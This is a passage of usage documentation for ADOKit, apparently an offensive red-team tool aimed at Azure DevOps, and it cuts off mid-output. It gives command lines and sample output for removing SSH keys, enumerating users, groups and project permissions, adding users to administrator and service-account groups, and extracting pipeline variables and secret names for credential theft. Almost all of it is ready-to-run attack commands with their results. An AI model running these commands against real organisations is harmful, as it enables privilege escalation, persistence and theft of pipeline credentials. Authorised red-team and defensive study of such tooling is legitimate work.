    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 11:37:10 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    SSH Key ID | Name | Scope | Valid Until | Public SSH Key
    -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
    ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

    4/3/23 15:37:11 Finished execution of listsshkey

    Remove SSH Key

    Use Case

    Remove an SSH key for a given user in an Azure DevOps instance.

    Syntax

    Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

    ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

    ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

    Example Output

    C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

    ==================================================
    Module: removesshkey
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 1:50:08 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

    SSH Key ID | Name | Scope | Valid Until | Public SSH Key
    ---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
    ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

    4/3/23 17:50:09 Finished execution of removesshkey

    List Users

    Use Case

    List users within an Azure DevOps instance

    Syntax

    Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

    ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listuser
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:12:07 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Username | Display Name | UPN
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    user1 | User 1 | user1@YourOrganization.onmicrosoft.com
    jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
    rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
    user2 | User 2 | user2@YourOrganization.onmicrosoft.com

    4/3/23 20:12:08 Finished execution of listuser

    Search User

    Use Case

    Search for given user(s) in Azure DevOps instance

    Syntax

    Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

    ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

    ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

    Example Output

    C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

    ==================================================
    Module: searchuser
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:12:23 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Username | Display Name | UPN
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    user1 | User 1 | user1@YourOrganization.onmic rosoft.com
    user2 | User 2 | user2@YourOrganization.onmicrosoft.com

    4/3/23 20:12:24 Finished execution of searchuser

    List Groups

    Use Case

    List groups within an Azure DevOps instance

    Syntax

    Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

    ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listgroup
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:48:45 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    UPN | Display Name | Description
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    [TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
    [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
    [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
    [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
    [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
    [TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
    [YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
    [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


    ---SNIP---

    4/3/23 20:48:46 Finished execution of listgroup

    Search Groups

    Use Case

    Search for given group(s) in Azure DevOps instance

    Syntax

    Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

    ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

    ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

    Example Output

    C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

    ==================================================
    Module: searchgroup
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:48:41 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    UPN | Display Name | Description
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
    [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
    [TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
    [TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
    [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
    [ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
    [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
    [TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

    4/3/23 20:48:42 Finished execution of searchgroup

    Get Group Members

    Use Case

    List all group members for a given group

    Syntax

    Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

    ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

    ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

    Example Output

    C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

    ==================================================
    Module: getgroupmembers
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 9:11:03 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
    [TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
    [MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
    [TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
    [TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
    [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
    [ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
    [MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

    4/4/23 13:11:09 Finished execution of getgroupmembers

    Get Project Permissions

    Use Case

    Get a listing of who has permissions to a given project.

    Syntax

    Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

    ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

    ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

    Example Output

    C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getpermissions
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 9:11:16 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    UPN | Display Name | Description
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
    [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
    [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
    [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
    [MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
    [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


    [*] INFO: List ing group members for each group that has permissions to this project



    GROUP NAME: [MaraudersMap]\Build Administrators

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


    GROUP NAME: [MaraudersMap]\Contributors

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
    [MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


    GROUP NAME: [MaraudersMap]\MaraudersMap Team

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


    GROUP NAME: [MaraudersMap]\Project Administrators

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


    GROUP NAME: [MaraudersMap]\Project Valid Users

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


    GROUP NAME: [MaraudersMap]\Readers

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

    4/4/23 13:11:18 Finished execution of getpermissions

    Add Project Admin

    Use Case

    Add a user to the Project Administrators group for a given project.

    Syntax

    Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: addprojectadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 2:52:45 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    -------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
    [MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/4/23 18:52:47 Finished execution of addprojectadmin

    Remove Project Admin

    Use Case

    Remove a user from the Project Administrators group for a given project.

    Syntax

    Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: removeprojectadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 3:19:43 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    ------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

    4/4/23 19:19:44 Finished execution of removeprojectadmin

    Add Build Admin

    Use Case

    Add a user to the Build Administrators group for a given project.

    Syntax

    Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: addbuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 3:41:51 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    -------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
    [MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/4/23 19:41:55 Finished execution of addbuildadmin

    Remove Build Admin

    Use Case

    Remove a user from the Build Administrators group for a given project.

    Syntax

    Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: removebuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 3:42:10 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    ------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

    4/4/23 19:42:11 Finished execution of removebuildadmin

    Add Collection Admin

    Use Case

    Add a user to the Project Collection Administrators group.

    Syntax

    Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 4:04:40 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Administrators group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    -------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
    [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
    [YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/4/23 20:04:43 Finished execution of addcollectionadmin

    Remove Collection Admin

    Use Case

    Remove a user from the Project Collection Administrators group.

    Syntax

    Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 4:10:35 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    ------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith

    4/4/23 20:10:38 Finished execution of removecollectionadmin

    Add Collection Build Admin

    Use Case

    Add a user to the Project Collection Build Administrators group.

    Syntax

    Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionbuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:21:39 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    ---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

    Remove Collection Build Admin

    Use Case

    Remove a user from the Project Collection Build Administrators group.

    Syntax

    Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionbuildadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:21:59 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

    4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

    Add Collection Build Service Account

    Use Case

    Add a user to the Project Collection Build Service Accounts group.

    Syntax

    Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionbuildsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:22:13 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    ------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

    4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

    Remove Collection Build Service Account

    Use Case

    Remove a user from the Project Collection Build Service Accounts group.

    Syntax

    Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionbuildsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 8:22:27 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    ----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

    4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

    Add Collection Service Account

    Use Case

    Add a user to the Project Collection Service Accounts group.

    Syntax

    Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: addcollectionsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 11:21:01 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
    [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
    [YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1

    4/5/23 15:21:04 Finished execution of addcollectionsvc

    Remove Collection Service Account

    Use Case

    Remove a user from the Project Collection Service Accounts group.

    Syntax

    Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

    ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

    Example Output

    C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

    ==================================================
    Module: removecollectionsvc
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/5/2023 11:21:43 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

    [+] SUCCESS: User successfully removed

    Group | Mail Address | Display Name
    -------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

    4/5/23 15:21:44 Finished execution of removecollectionsvc

    Get Pipeline Variables

    Use Case

    Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

    Syntax

    Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

    ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

    ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

    Example Output

    C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getpipelinevars
    Auth Type: Cookie
    Project: maraudersmap
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/6/2023 12:08:35 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Pipeline Var Name | Pipeline Var Value
    -----------------------------------------------------------------------------------
    credential | P@ssw0rd123!
    url | http://blah/

    4/6/23 16:08:36 Finished execution of getpipelinevars

    Get Pipeline Secrets

    Use Case

    Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.

    Syntax

    Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

    ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

    ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

    ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

    Example Output

    C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getpipelinesecrets
    Auth Type: Cookie
